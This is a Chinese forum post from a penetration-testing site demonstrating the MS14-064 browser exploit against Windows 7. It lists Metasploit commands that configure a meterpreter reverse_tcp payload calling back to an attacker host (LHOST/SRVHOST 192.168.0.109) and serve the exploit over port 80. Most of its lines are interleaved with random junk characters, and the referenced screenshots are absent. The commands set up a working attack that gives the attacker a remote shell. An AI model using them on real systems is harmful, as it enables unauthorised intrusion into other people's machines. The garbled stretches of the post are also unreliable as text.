中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]

作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

% S" ]0 X9 W' j! i o, ~ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示8 |3 ^7 \9 C: O. T# f

' O5 r% ^" F, p' u

/ Q2 m4 d1 n- o) E+ K 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 3 k6 H P$ j# i& o3 d' ?

4 U8 o; w- s8 e7 X& j

# `* C% s3 D3 I( M, f. [ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp# N E! w$ O, B- q; ~) Z: G

* y: ?8 o& H( S4 J5 L

; q3 x5 d6 y! i! }             set AllowPowershellPrompt true 3 ^% K( B0 G: ]5 x9 T

. E/ q& ?% Y, }% u6 V! C- c

5 E0 r6 m* D6 m) O             Set LHOST 192.168.0.109 + g0 \9 f, J1 x

* h& E% ^6 c: s" }4 ]+ w

# K8 h% T" C% p+ |: B             set SRVHOST 192.168.0.1096 ^" H1 H) t# E; {

5 L2 e. I0 B( _4 L/ v

& q* b' k+ v6 b V# y             Set uripath share' W6 ^/ q, [" F+ G3 l' @

' \7 h5 P9 |) Q4 r! q+ T m

- l# C; |. ]9 G- ^8 m; W- \+ k0 Q" [             Set srvport 80 & ~9 F( ~! I/ N0 t$ ]

F2 @9 S9 W8 U+ x" V! e4 T

; p J4 C; M2 ~4 ^" f) `: C/ {, K  " h8 q! z; Y4 W8 ~2 ]( ]

% S; _: E) I& i' e. ^) r9 v

) v8 @% R/ U4 H5 H   3 L' x. X6 I$ }- f0 \- W6 S: p

& w& ?/ A; U) ~ \) a

/ }! ^" q( U$ {# F) L2 p2 y5 q8 |! U   + s- Z ^- N: \3 c

; n$ R( F% m' |+ l p

* V* [8 t/ r ?. g5 q3 y) W1 Y1 f5 c  ; q; z# ~+ R: n, k* f7 v

8 |+ J1 H. H2 b. I9 Y& m

. q! y# T2 }$ R( C" }1 f  & M1 n1 D$ g: V# m7 |

* P) C; `1 {3 G3 ]$ p7 `

* N: c& Z+ L2 N: F: E+ ~ D 下面我们来访问本地地址如图:: L' M' x* P% `2 U; `5 S6 Y4 c" V

) T; q" _* `: k# _4 V; Q3 ]! C% N

8 k$ u: q" i$ c' T8 M  : c0 y: ]( y* o" f6 o$ z' t! T

, O' z' n# U' N$ j

8 l, t+ l5 M% N6 {; L/ C2 U6 w; B  ) _+ N1 u4 K1 e1 w' k; | i3 `

; Q$ h9 O. r8 n* ~$ ]3 u% r' ^+ [

# A+ r) w7 L7 E( Q1 _' X5 l- Y / z2 A: }. }0 I, h6 S0 A






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2